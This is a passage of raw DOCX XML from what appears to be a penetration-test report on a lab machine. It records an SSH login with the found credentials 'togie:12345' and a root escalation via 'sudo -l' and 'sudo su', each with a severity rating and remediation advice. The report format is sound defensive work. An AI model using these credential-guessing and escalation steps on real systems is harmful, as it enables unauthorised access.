                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4761270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAA8" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>915f50888d0e04ae85ae7582e06fcaf9.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAA9" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Looking at that password, it does however disclose a possible (user)name, ‘Togie’. Combining that with the password we found before we try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>togie:12345</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on SSH. It works!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAAA" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t>Since we gained shell access at this point, I did not look at the IRC port that is open any further.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAAB" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="severity-6"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Severity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w14:paraId="70FCEAAC" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Anyone with connectivity to the target machine can gain access to sensitive files through the exposed share, and potentially guess or bruteforce the weak credentials to gain SSH access to the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAAD" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="remediation-6"/>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="70FCEAAE" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Choose stronger passwords for services, especially external services such as SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAAF" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Limit (database) account privileges according to least privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAB0" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Limit network access to SSH and MySQL if remote access to these ports is not required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAB1" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="proof-6"/>
      <w:r>
        <w:t>Proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="70FCEAB2" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAEA" wp14:editId="70FCEAEB">
            <wp:extent cx="5943600" cy="3082806"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Picture" descr="79550bc5070dbaccbc95e0795d41a50f.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/4a37b0a8091645d7a6b5ebfb1b94710b.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3082806"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAB3" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>79550bc5070dbaccbc95e0795d41a50f.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAB4" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="privilege-escalation-3"/>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="70FCEAB5" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="vulnerability-exploitation-7"/>
      <w:r>
        <w:t>Vulnerability exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="70FCEAB6" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>From the last screenshot (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), we notice we are in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> group. Running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sudo -l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and specifying the password of 12345 shows us that we can run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> commands as root, which means we can trivially escalate our privileges by running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sudo su</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAB7" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="severity-7"/>
      <w:r>
        <w:t>Severity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w14:paraId="70FCEAB8" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Anyone with access to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> group or similar privileges in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sudoers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file can trivially gain full control over the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAB9" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="remediation-7"/>
      <w:r>
        <w:t>Remediation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w14:paraId="70FCEABA" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Limit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> privileges on a least-privilege basis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEABB" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="proof-7"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="70FCEABC" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAEC" wp14:editId="7B966FF7">
            <wp:extent cx="4352925" cy="3615223"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="Picture" descr="6b320de16f8019995f35475af9004dd2.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/e6f2888300044268a027062aa4973311.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4365463" cy="3625636"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEABD" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>6b320de16f8019995f35475af9004dd2.png</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00863B21" w:rsidSect="00DB5768">
      <w:footerReference w:type="default" r:id="rId39"/>
      <w:pgSz w:w="12240" w:h="15840"/>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D222D" w14:textId="77777777" w:rsidR="00AB0EA3" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="05A8ABD2" w14:textId="77777777" w:rsidR="00AB0EA3" w:rsidRDefault="00AB0E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945007"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="267C68C2" w14:textId="599AE710" w:rsidR="00DB5768" w:rsidRDefault="00DB57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28E169" w14:textId="77777777" w:rsidR="00DB5768" w:rsidRDefault="00DB5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AD7C6" w14:textId="77777777" w:rsidR="00AB0EA3" w:rsidRDefault="00AB0EA3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0EBDBA9B" w14:textId="77777777" w:rsidR="00AB0EA3" w:rsidRDefault="00AB0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A12CD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041AB9B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78CC7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190218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586D74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9E4A97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4F2E1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226A02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EE4B8E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C7269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CA6502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3DA8C9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A566D5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2"/>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4DAC"/>
    <w:rsid w:val="002B22ED"/>
    <w:rsid w:val="0047626D"/>
    <w:rsid w:val="004E29B3"/>
    <w:rsid w:val="00590D07"/>
    <w:rsid w:val="00784D58"/>
    <w:rsid w:val="00863B21"/>
    <w:rsid w:val="00877200"/>
    <w:rsid w:val="008D6863"/>
    <w:rsid w:val="00AB0EA3"/>
    <w:rsid w:val="00B86B75"/>
    <w:rsid w:val="00BC48D5"/>
    <w:rsid w:val="00C36279"/>
    <w:rsid w:val="00C53697"/>
    <w:rsid w:val="00CB0044"/>
    <w:rsid w:val="00DB5768"/>
    <w:rsid w:val="00E315A3"/>
    <w:rsid w:val="00F855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C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D502F"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00E95256"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pageBreakBefore/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="600" w:after="120" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="center"/>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658DF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="120" w:after="24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880047"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="120" w:after="240"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A15CB3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="120" w:after="240"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FD1176"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:iCs/>
      <w:smallCaps/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00DE4CFA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00DE4CFA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00DE4CFA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00DE4CFA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"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D502F"/>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rsid w:val="007C05FA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Title"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:rsid w:val="00074111"/>
    <w:pPr>
      <w:spacing w:before="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Author">
    <w:name w:val="Author"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:rsid w:val="002A2AC4"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Date">
    <w:name w:val="Date"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:rsid w:val="00CF2422"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
    </w:r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rsid w:val="001D502F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BlockText">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="BodyText"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="004B5198"/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:sz="18" w:space="4" w:color="632423" w:themeColor="accent2" w:themeShade="80"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      <w:spacing w:before="100" w:after="100"/>
      <w:ind w:left="240"/>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976F9"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:sz w:val="2"/>
      <w:szCs w:val="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SourceCodeChar"/>
    <w:rsid w:val="00C9130D"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="auto"/>
      <w:sz w:val="18"/>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uiPriority w:val="99"/>
    <w:rsid w:val="007B0B28"/>
    <w:rPr>
      <w:color w:val="1F497D" w:themeColor="text2"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00DE4CFA"/>
    <w:pPr>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="MacroText">
    <w:name w:val="macro"/>
    <w:link w:val="MacroTextChar"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00194D6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BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:rsid w:val="002A2AC4"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="MacroTextChar">
    <w:name w:val="Macro Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="MacroText"/>
    <w:rsid w:val="00194D61"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SourceCode">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="MacroText"/>
    <w:link w:val="SourceCodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="00631814"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="6" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
        <w:left w:val="single" w:sz="4" w:space="12" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
        <w:bottom w:val="single" w:sz="4" w:space="6" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
        <w:right w:val="single" w:sz="4" w:space="12" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="480"/>
        <w:tab w:val="clear" w:pos="960"/>
        <w:tab w:val="clear" w:pos="1440"/>
        <w:tab w:val="clear" w:pos="1920"/>
        <w:tab w:val="clear" w:pos="2400"/>
        <w:tab w:val="clear" w:pos="2880"/>
        <w:tab w:val="clear" w:pos="3360"/>
        <w:tab w:val="clear" w:pos="3840"/>
        <w:tab w:val="clear" w:pos="4320"/>
      </w:tabs>
      <w:wordWrap w:val="0"/>
      <w:spacing w:before="320" w:after="320"/>
      <w:ind w:left="318" w:right="318"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SourceCodeChar">
    <w:name w:val="Source Code Char"/>
    <w:basedOn w:val="MacroTextChar"/>
    <w:link w:val="SourceCode"/>
    <w:rsid w:val="00631814"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KeywordTok">
    <w:name w:val="KeywordTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="204A87"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DataTypeTok">
    <w:name w:val="DataTypeTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="204A87"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DecValTok">
    <w:name w:val="DecValTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="0000CF"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BaseNTok">
    <w:name w:val="BaseNTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
